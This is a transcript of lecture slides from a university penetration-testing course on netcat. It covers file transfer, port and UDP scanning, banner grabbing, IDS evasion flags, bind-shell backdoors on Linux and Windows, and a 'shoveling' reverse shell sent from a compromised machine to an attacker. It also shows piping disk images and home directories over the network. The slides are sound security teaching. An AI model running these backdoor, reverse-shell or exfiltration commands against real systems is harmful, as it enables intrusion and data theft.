comp265 - pentesting netcat. what? like cat, but for networks standard input sent over network to...
TRANSCRIPT
COMP265 - Pentesting
netcat
What?
• Like cat, but for networks
• Standard input sent over network to remote ip:port
• Packets from network sent to standard output
• Low level
• Versatile
• “The network Swiss army knife”
Basic Operation
• Client mode:
– Connects to specific remote port
• Listen mode:
– Waits for connection on a port
• Both modes
– Send Standard Input to net
– Data from net sent to Standard Output
• Messages from netcat sent to standard Error
• Packets can have source routing attached
Netcat Command• May be two letter command “nc”
– Like cp and other traditional two letter unix commands
– nc options hostname ports
• May be the word “netcat”
• Another variant “ncat”, from nmap project
– Supports a few more options
• Depends on the platform, Kali has both
• Sometimes have to compile from source to get all options (Suse)
Command Options-l listen mode, for inbound connects
-L "Listen harder" Persistent listener (Win only)
-n numeric-only IP addresses, no DNS
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
--sctp sctp mode
-v verbose [use twice to be more verbose]
Command Options
-i secs delay interval for lines sent, ports scanned
-t answer TELNET negotiation
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
These three options not available on some packages
-o file or -x file (hex) dump of traffic
-e prog or -c command program to exec after connect
-g gateway source-routing hop point[s], up to 8
What for?• Send files
• Telnet
• Backdoor
• Port scan
• Banner grabbing
• Reverse shell
• Relay (proxy)
• Port forward
• Replay
Arguments
• Host can be name or ip
-n = no dns lookups, ip only
otherwise
full DNS forward and reverse lookup
-v or -vv = verbose messages, always sent to standard error
-w limits wait time, -w 3 recommended
-o filename produces dump of all traffic > or <
-i slows down sending, used if input from a file
Send Files
• Sender
– nc -l -p 80 < file.txt
– file.txt | nc -l -p 80
• Reciever
– nc 192.168.1.1 80 > file.txt
• Note use of redirect and pipe
• Receiver could have been a web browser
• < > | all enhance power of netcat
Another Example
dd if=/dev/sda3 | gzip | nc -l 80
nc 192.168.17.1 80 > sda3.img.gz
• Or, listener can be receiver
nc -w 3 -l 80 > /home.cmb.tar.gz
tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80
nc telnet
cmblap:~ # telnet 192.168.17.24 25
Trying 192.168.17.24...
Connected to 192.168.17.24.
Escape character is '^]'.
220 fivefortyfour.com ESMTP
^C
^]
telnet> quit
Connection closed.
cmblap:~ # netcat 192.168.17.24 25
220 fivefortyfour.com ESMTP
helo
250 fivefortyfour.com
quit
221 fivefortyfour.com
cmblap:
As telnet client
• Netcat quits when you want it to
• Doesn't pay attention to standard input EOF
• Doesn't require escape character
• Less cruft
• Transfers arbitrary binary data
• Better utility for probing services
• Can use UDP
-t responds automatically to telnet option negotiations
Probing?• Netcat can do port scans This took around 1 seccmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000
jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open
jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open
jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open
jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open
jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
jabber.fivefortyfour.com [192.168.17.24] 80 (http) open
jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
jabber.fivefortyfour.com [192.168.17.24] 24 (?) open
jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
cmblap:~ #
UDP scans too
• These are much slowercmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100
jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open
jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
Scanning Options
-i
– Delay interval to slow down scans
-r
– Randomise ports, including source
-z
– Send no data (TCP) or minimal data (UDP)
-i and -r help to avoid ids
-vv reports closed ports
Fancier Scan
echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000
Banner Grabbing
cmblap:~ # netcat -v 192.168.17.24 110
jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
+OK Hello there.
quit
+OK Better luck next time.
cmblap:~ # netcat -v 192.168.17.24 25
jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
220 fivefortyfour.com ESMTP
quit
221 fivefortyfour.com
cmblap:~ # netcat -v 192.168.17.24 22
jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
SSH-1.99-OpenSSH_4.1
quit
Protocol mismatch.
Chat Session
• Just for fun
• Machine 192.168.17.6
– nc -l -p 1234
• Machine 2
– nc 192.168.17.6 1234
• Both machine's keyboard input appears on the other machine's screen
• Note: use -v option to solve problems that may appear
Web Browser
echo “GET somewhere.com” | nc address 80 > page.html
Backdoor
• By routing netcat's standard output to a command interpreter, we create a remote shell
cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh
Connection from 192.168.18.1:4289
cmblap:/usr/local/src/netcat-0.7.1/src #
• I had to dl and build to enable the -e switch
• Cannot pass parameters to program
On the other end
pdlnx2:~ # netcat -v 192.168.18.8 1234
DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap
cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open
df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda6 20641788 7448780 12144368 39% /
udev 1540268 192 1540076 1% /dev
/dev/sda2 39942856 8711724 31231132 22% /windows/C
/dev/sda8 20650996 17395552 2206404 89% /home/cmb
exit
pdlnx2:~ #
More backdoors
• On windows:
nc -L -p 1234 -d -e cmd.exe
• -L means listen hard
– wait for connections
– Not needed on unix
• -d means detach from process
– Also not needed on linux
“Shoveling” a Shell• Aka Reverse Shell
• Compromised machine cannot accept connections
– Has to initiate connections because of firewall/NAT
• Attacker listens from outside the firewall
– netcat -v -l -p 1234
• Script on compromised machine starts shell then connects to attacker
– netcat ip.addr 1234 -e /bin/sh
• Script has to run forever, or at timed intervals, or in response to some event
Port Forwarding
• Forwarding localhost port 8080 to remote host port 80
• ncat -l localhost 8080 --sh-exec "ncat remote.host 80"
References
• ncat– http://nmap.org/ncat/– User's guide is good reference
• http://nmap.org/ncat/guide/index.html
• netcat– http://netcat.sourceforge.net/
• Don't forget the man pages
Lab
• Lab today will exercise many of these functions
• Due the day of the lab next week, Feb 18
– No new lab next week